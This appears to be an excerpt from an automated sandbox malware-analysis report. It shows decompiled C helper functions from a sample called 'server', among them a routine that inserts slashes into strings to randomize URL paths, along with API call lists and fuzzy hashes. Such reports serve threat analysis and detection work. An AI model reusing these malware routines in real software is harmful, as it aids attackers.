                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: aad8c79f4a0cfff9bdda8eb387e3b81228e233f8a011d1ecc15b785a153d4c6d
                • Instruction ID: 37fc0b6eee67db4388391601b805e0af7d94b90e60e437a6e44b64756080c940
                • Opcode Fuzzy Hash: aad8c79f4a0cfff9bdda8eb387e3b81228e233f8a011d1ecc15b785a153d4c6d
                • Instruction Fuzzy Hash: 8221607590021AFFCB11EFE4D988D9EBBB9FF48304B208169E94597214EB71EA58CF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E02222708(unsigned int __eax, void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _t21;
                				signed short _t23;
                				char* _t27;
                				void* _t29;
                				void* _t30;
                				unsigned int _t33;
                				void* _t37;
                				unsigned int _t38;
                				void* _t41;
                				void* _t42;
                				int _t45;
                				void* _t46;
                
                				_t42 = __eax;
                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                				_t38 = __eax;
                				_t30 = RtlAllocateHeap( *0x222a2d8, 0, (__eax >> 3) + __eax + 1);
                				_v12 = _t30;
                				if(_t30 != 0) {
                					_v8 = _t42;
                					do {
                						_t33 = 0x18;
                						if(_t38 <= _t33) {
                							_t33 = _t38;
                						}
                						_t21 =  *0x222a2f0; // 0x23f6d10e
                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                						 *0x222a2f0 = _t23;
                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                						memcpy(_t30, _v8, _t45);
                						_v8 = _v8 + _t45;
                						_t27 = _t30 + _t45;
                						_t38 = _t38 - _t45;
                						_t46 = _t46 + 0xc;
                						 *_t27 = 0x2f;
                						_t13 = _t27 + 1; // 0x1
                						_t30 = _t13;
                					} while (_t38 > 8);
                					memcpy(_t30, _v8, _t38 + 1);
                				}
                				return _v12;
                			}

















                0x02222710
                0x02222713
                0x02222719
                0x02222731
                0x02222733
                0x02222738
                0x0222273a
                0x0222273d
                0x0222273f
                0x02222742
                0x02222744
                0x02222744
                0x02222746
                0x02222751
                0x02222756
                0x02222767
                0x0222276f
                0x02222774
                0x02222777
                0x0222277a
                0x0222277c
                0x0222277f
                0x02222782
                0x02222782
                0x02222785
                0x02222790
                0x02222795
                0x0222279f

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02226708,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 02222713
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0222272B
                • memcpy.NTDLL(00000000,02BD9600,-00000008,?,?,?,02226708,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 0222276F
                • memcpy.NTDLL(00000001,02BD9600,00000001,02223ECE,00000000,02BD9600), ref: 02222790
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 92934c84420b878f45ba229e3917395dcaa7bdbc40a3780c4773d58b959d1819
                • Instruction ID: ff832da89e81e1ded178ffe2ad55fe84fa39cc66568238eaf7fa20cabd1bbdf9
                • Opcode Fuzzy Hash: 92934c84420b878f45ba229e3917395dcaa7bdbc40a3780c4773d58b959d1819
                • Instruction Fuzzy Hash: E5110A72E00225BFD7248AA9DC88D9E7BAEEB90360B150276F804D7150E7729E188790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02227843(void* __esi) {
                				struct _SECURITY_ATTRIBUTES* _v4;
                				void* _t8;
                				void* _t10;
                
                				_v4 = 0;
                				memset(__esi, 0, 0x38);
                				_t8 = CreateEventA(0, 1, 0, 0);
                				 *(__esi + 0x1c) = _t8;
                				if(_t8 != 0) {
                					_t10 = CreateEventA(0, 1, 1, 0);
                					 *(__esi + 0x20) = _t10;
                					if(_t10 == 0) {
                						CloseHandle( *(__esi + 0x1c));
                					} else {
                						_v4 = 1;
                					}
                				}
                				return _v4;
                			}






                0x0222784d
                0x02227851
                0x02227866
                0x02227868
                0x0222786d
                0x02227873
                0x02227875
                0x0222787a
                0x02227885
                0x0222787c
                0x0222787c
                0x0222787c
                0x0222787a
                0x02227893

                APIs
                • memset.NTDLL ref: 02227851
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 02227866
                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02227873
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?), ref: 02227885
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CreateEvent$CloseHandlememset
                • String ID:
                • API String ID: 2812548120-0
                • Opcode ID: b3edef6b3cf9b1c5fb2b6354881b9da98b732a5b1ddaae5011d5158bd5b21599
                • Instruction ID: 91e70963205a42db1060e26c7f8788dfa5b8035e2a2361b09da3bd96fcd51359
                • Opcode Fuzzy Hash: b3edef6b3cf9b1c5fb2b6354881b9da98b732a5b1ddaae5011d5158bd5b21599
                • Instruction Fuzzy Hash: BBF05EB151431CBFD3206FA6DCC4C2BFBACEB8219CB524E3EF14292111C673A95C8A61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00501C63), ref: 00501FDE
                • GetVersion.KERNEL32(?,00501C63), ref: 00501FED
                • GetCurrentProcessId.KERNEL32(?,00501C63), ref: 00502009
                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00501C63), ref: 00502022
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction ID: 5aef440978b329ac0749ef90c869a383fb288a48ed6004586c619065f822f00d
                • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction Fuzzy Hash: 2FF04FB05413019BE7609F78BE1DB593F68B795752F104136E741FA1E4E7708982CB5C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02223230() {
                				void* _t1;
                				intOrPtr _t5;
                				void* _t6;
                				void* _t7;
                				void* _t11;
                
                				_t1 =  *0x222a30c; // 0x1b0
                				if(_t1 == 0) {
                					L8:
                					return 0;
                				}
                				SetEvent(_t1);
                				_t11 = 0x7fffffff;
                				while(1) {
                					SleepEx(0x64, 1);
                					_t5 =  *0x222a35c; // 0x0
                					if(_t5 == 0) {
                						break;
                					}
                					_t11 = _t11 - 0x64;
                					if(_t11 > 0) {
                						continue;
                					}
                					break;
                				}
                				_t6 =  *0x222a30c; // 0x1b0
                				if(_t6 != 0) {
                					CloseHandle(_t6);
                				}
                				_t7 =  *0x222a2d8; // 0x27e0000
                				if(_t7 != 0) {
                					HeapDestroy(_t7);
                				}
                				goto L8;
                			}








                0x02223230
                0x02223237
                0x02223281
                0x02223283
                0x02223283
                0x0222323b
                0x02223241
                0x02223246
                0x0222324a
                0x02223250
                0x02223257
                0x00000000
                0x00000000
                0x02223259
                0x0222325e
                0x00000000
                0x00000000
                0x00000000
                0x0222325e
                0x02223260
                0x02223268
                0x0222326b
                0x0222326b
                0x02223271
                0x02223278
                0x0222327b
                0x0222327b
                0x00000000

                APIs
                • SetEvent.KERNEL32(000001B0,00000001,0222109A), ref: 0222323B
                • SleepEx.KERNEL32(00000064,00000001), ref: 0222324A
                • CloseHandle.KERNEL32(000001B0), ref: 0222326B
                • HeapDestroy.KERNEL32(027E0000), ref: 0222327B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: a07738fc235e2c660d924cfb313964ff377ada2ddb8903a656d294a187341335
                • Instruction ID: d7647ea5fceae90a0797a3837182b3357b5efac5099ecf38804db4fbd9c276ad
                • Opcode Fuzzy Hash: a07738fc235e2c660d924cfb313964ff377ada2ddb8903a656d294a187341335
                • Instruction Fuzzy Hash: 27F08274E50222B7DB309AF5B98CA4237D8AB04760B161A40BC00E6284CB67D85C8960
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0222607C() {
                				void* _v0;
                				void** _t3;
                				void** _t5;
                				void** _t7;
                				void** _t8;
                				void* _t10;
                
                				_t3 =  *0x222a3cc; // 0x2bd9600
                				__imp__( &(_t3[0x10]));
                				while(1) {
                					_t5 =  *0x222a3cc; // 0x2bd9600
                					_t1 =  &(_t5[0x16]); // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t7 =  *0x222a3cc; // 0x2bd9600
                				_t10 =  *_t7;
                				if(_t10 != 0 && _t10 != 0x222b142) {
                					HeapFree( *0x222a2d8, 0, _t10);
                					_t7 =  *0x222a3cc; // 0x2bd9600
                				}
                				 *_t7 = _v0;
                				_t8 =  &(_t7[0x10]);
                				__imp__(_t8);
                				return _t8;
                			}









                0x0222607c
                0x02226085
                0x02226095
                0x02226095
                0x0222609a
                0x0222609f
                0x00000000
                0x00000000
                0x0222608f
                0x0222608f
                0x022260a1
                0x022260a6
                0x022260aa
                0x022260bd
                0x022260c3
                0x022260c3
                0x022260cc
                0x022260ce
                0x022260d2
                0x022260d8

                APIs
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02226085
                • Sleep.KERNEL32(0000000A), ref: 0222608F
                • HeapFree.KERNEL32(00000000), ref: 022260BD
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 022260D2
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 28a5b77d0d944a6a48514a7d96ae443b7747892c40480eaaa2a157d4910c99f2
                • Instruction ID: 7b1a72f9865769e01daafeb62757ab129ebc8f630a4635ca6068527c5492e180
                • Opcode Fuzzy Hash: 28a5b77d0d944a6a48514a7d96ae443b7747892c40480eaaa2a157d4910c99f2
                • Instruction Fuzzy Hash: CBF03A75A90212BBE7388FD4F94DB2537B6BB44700F166804E802CB7A0C332A9ACDA14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E02222058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                				intOrPtr* _v8;
                				void* _t17;
                				intOrPtr* _t22;
                				void* _t27;
                				char* _t30;
                				void* _t33;
                				void* _t34;
                				void* _t36;
                				void* _t37;
                				void* _t39;
                				int _t42;
                
                				_t17 = __eax;
                				_t37 = 0;
                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                				_t2 = _t17 + 1; // 0x1
                				_t28 = _t2;
                				_t34 = E022233DC(_t2);
                				if(_t34 != 0) {
                					_t30 = E022233DC(_t28);
                					if(_t30 == 0) {
                						E022261DA(_t34);
                					} else {
                						_t39 = _a4;
                						_t22 = E02227AE9(_t39);
                						_v8 = _t22;
                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                							_a4 = _t39;
                						} else {
                							_t26 = _t22 + 2;
                							_a4 = _t22 + 2;
                							_t22 = E02227AE9(_t26);
                							_v8 = _t22;
                						}
                						if(_t22 == 0) {
                							__imp__(_t34, _a4);
                							 *_t30 = 0x2f;
                							 *((char*)(_t30 + 1)) = 0;
                						} else {
                							_t42 = _t22 - _a4;
                							memcpy(_t34, _a4, _t42);
                							 *((char*)(_t34 + _t42)) = 0;
                							__imp__(_t30, _v8);
                						}
                						 *_a8 = _t34;
                						_t37 = 1;
                						 *_a12 = _t30;
                					}
                				}
                				return _t37;
                			}














                0x02222058
                0x02222062
                0x02222064
                0x0222206a
                0x0222206a
                0x02222073
                0x02222077
                0x02222083
                0x02222087
                0x022220fb
                0x02222089
                0x02222089
                0x0222208d
                0x02222092
                0x02222097
                0x022220b1
                0x022220a0
                0x022220a0
                0x022220a4
                0x022220a7
                0x022220ac
                0x022220ac
                0x022220b6
                0x022220de
                0x022220e4
                0x022220e7
                0x022220b8
                0x022220ba
                0x022220c2
                0x022220cd
                0x022220d2
                0x022220d2
                0x022220ee
                0x022220f5
                0x022220f6
                0x022220f6
                0x02222087
                0x02222106

                APIs
                • lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,022251F7,?,?,?,?,00000102,022221E7,?,?,74CF81D0), ref: 02222064
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                  • Part of subcall function 02227AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02222092,00000000,00000001,00000001,?,?,022251F7,?,?,?,?,00000102), ref: 02227AF7
                  • Part of subcall function 02227AE9: StrChrA.SHLWAPI(?,0000003F,?,?,022251F7,?,?,?,?,00000102,022221E7,?,?,74CF81D0,00000000), ref: 02227B01
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022251F7,?,?,?,?,00000102,022221E7,?), ref: 022220C2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 022220D2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 022220DE
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 64c0d3034f0612fc15cf611c18f2a06a5e77fbbc77c180563458f62866e5fb8d
                • Instruction ID: 56091cbe004cd94b6c4e1fa2b2611ae561542dc9b5c690964a47288f93dcded2
                • Opcode Fuzzy Hash: 64c0d3034f0612fc15cf611c18f2a06a5e77fbbc77c180563458f62866e5fb8d
                • Instruction Fuzzy Hash: 3B21F33252423AFBCB119FE4CC44A9ABFB9AF15350B148150FC049B219DB37DB48CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02225DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				void* _v8;
                				void* _t18;
                				int _t25;
                				int _t29;
                				int _t34;
                
                				_t29 = lstrlenW(_a4);
                				_t25 = lstrlenW(_a8);
                				_t18 = E022233DC(_t25 + _t29 + _t25 + _t29 + 2);
                				_v8 = _t18;
                				if(_t18 != 0) {
                					_t34 = _t29 + _t29;
                					memcpy(_t18, _a4, _t34);
                					_t10 = _t25 + 2; // 0x2
                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                				}
                				return _v8;
                			}








                0x02225df9
                0x02225dfd
                0x02225e07
                0x02225e0c
                0x02225e11
                0x02225e13
                0x02225e1b
                0x02225e20
                0x02225e2e
                0x02225e33
                0x02225e3d

                APIs
                • lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,02BD9270,?,022252D0,004F0053,02BD9270,?,?,?,?,?,?,022268B6), ref: 02225DF4
                • lstrlenW.KERNEL32(022252D0,?,022252D0,004F0053,02BD9270,?,?,?,?,?,?,022268B6), ref: 02225DFB
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • memcpy.NTDLL(00000000,004F0053,74CB69A0,?,?,022252D0,004F0053,02BD9270,?,?,?,?,?,?,022268B6), ref: 02225E1B
                • memcpy.NTDLL(74CB69A0,022252D0,00000002,00000000,004F0053,74CB69A0,?,?,022252D0,004F0053,02BD9270), ref: 02225E2E
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: ca0f90d88e4f4eb6bec9198a43cbfbe322d623c6504b5c342edf4c3f9be26d11
                • Instruction ID: 59c2c4a7d5def03bb9b9c6fe10ed66e1c812b81444994bba4f3d79dc8d0447ad
                • Opcode Fuzzy Hash: ca0f90d88e4f4eb6bec9198a43cbfbe322d623c6504b5c342edf4c3f9be26d11
                • Instruction Fuzzy Hash: C7F03C72910129BB8F15DFE8CC84C9E7BADEF093547518062B90497115E736EA248BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(02BD9C10,00000000,00000000,00000000,02223EF9,00000000), ref: 02227573
                • lstrlen.KERNEL32(?), ref: 0222757B
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • lstrcpy.KERNEL32(00000000,02BD9C10), ref: 0222758F
                • lstrcat.KERNEL32(00000000,?), ref: 0222759A
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: d440ce43981e6523a3ef64d048cb52c3c04ed693fd7a49a74507839670aabe5a
                • Instruction ID: 44f3ad72a605b5ba1c7f3bf3df6c8f9dc25723e10b0086a482c873dfc7e3584b
                • Opcode Fuzzy Hash: d440ce43981e6523a3ef64d048cb52c3c04ed693fd7a49a74507839670aabe5a
                • Instruction Fuzzy Hash: 2FE065339016357B87215AE4AC4CC9BF66DEF896507050816F600D7100D73699198BA5
                Uniqueness

                Uniqueness Score: -1.00%